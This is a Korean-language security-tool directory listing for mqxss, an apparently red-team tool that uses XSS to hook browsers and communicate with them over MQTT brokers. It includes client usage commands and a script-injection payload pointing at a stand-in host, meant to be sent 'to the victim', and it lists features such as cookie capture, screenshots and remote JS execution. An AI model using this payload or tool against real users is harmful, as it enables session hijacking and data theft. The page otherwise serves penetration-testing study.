Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/grampae/mqxss
Payload GenerationWeb Application ExploitationInformation GatheringPenetration TestingCommand and ControlRed TeamingRemote Access Tool
GitHubgrampae/mqxss

mqxss

MQTT를 통한 후킹된 브라우저 통신

저장소 보기
832년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

mqxss v0.2

mqxss는 MQTT를 통해 후킹된 브라우저와 통신하는 클라이언트 역할을 합니다

Screenshot from 2023-07-03 15-15-35

이 도구를 beef나 xsshunter 대신 사용할 때의 이점은 js 페이로드를 호스팅하는 것 외에는 인프라 설정이 필요 없다는 것입니다. 공용 브로커를 사용할 수 있습니다 (단, 현재는 난독화를 사용하며, 암호화는 개발 중입니다).

후킹된 브라우저는 지정한 브로커의 MQTT 토픽에서 통신합니다. 이를 테스트할 수 있는 공개/무료 브로커가 많이 있습니다.

클라이언트는 python paho.mqtt 라이브러리를 사용하고, js 페이로드는 'mqttws31.min.js'를 사용하며, 이 파일은 여기 'https://cdnjs.cloudflare.com/ajax/libs/paho-mqtt/1.0.1/mqttws31.min.js'에서 가져옵니다.


사용법

Screenshot from 2024-01-17 11-34-59

JS 페이로드를 생성하려면 브라우저를 후킹하기 위해 런타임 시 -g 플래그와 함께 브로커, 포트, 토픽 변수를 설정하세요. 그러면 /js/ 폴더에 페이로드가 생성됩니다.

클라이언트를 실행하려면 브로커, 포트, 토픽을 다음과 같이 지정하세요.

mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname

자격 증명을 사용하여 클라이언트를 실행하려면 브로커, 포트, 사용자 이름, 비밀번호, 토픽을 다음과 같이 지정하세요.

mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname -u username -pw password

mqxss 클라이언트가 실행되는 동안 XSS 페이로드를 전송하세요. 피해자에게 보내세요. 예: '"><script src=https://example.com/x.js async></script> 또는 이와 유사한 것. 취약하다면 브라우저가 연결되었고 쿠키 등 기본 정보를 포함한 알림을 받게 됩니다.

a


기능:

  • js 페이로드는 MQTT QoS 1과 Last Will를 사용합니다. 클라이언트가 브로커에 연결되어 있지 않은 동안 발생하는 연결 끊김이나 연결을 mqxss가 통지받습니다
  • 런타임 시 브라우저를 후킹할 js 페이로드를 생성합니다
  • 현재 보안 웹소켓(secure websockets)을 사용하는 mqtt 브로커에서만 작동합니다
  • 편의를 위해 캡처된 쿠키와 함께 후킹된 브라우저의 위치를 브라우저에서 엽니다
  • 후킹 시 쿠키, IP, 기기 유형, 사용자 에이전트를 가져옵니다
  • 과거에 후킹되었던(현재 후킹되지 않은) 브라우저를 봅니다
  • 현재 후킹된 브라우저에 js를 전송하고 응답이 있으면 받습니다
  • 후킹된 브라우저의 스크린샷
  • 런타임 시 이를 요구하는 브로커를 위해 사용자 이름과 비밀번호를 설정합니다
  • mqxss.py에서 ptoken 및 userkey 변수를 설정한 다음 -po 명령줄 플래그를 사용하여 pushover 알림을 받습니다
도구 다운로드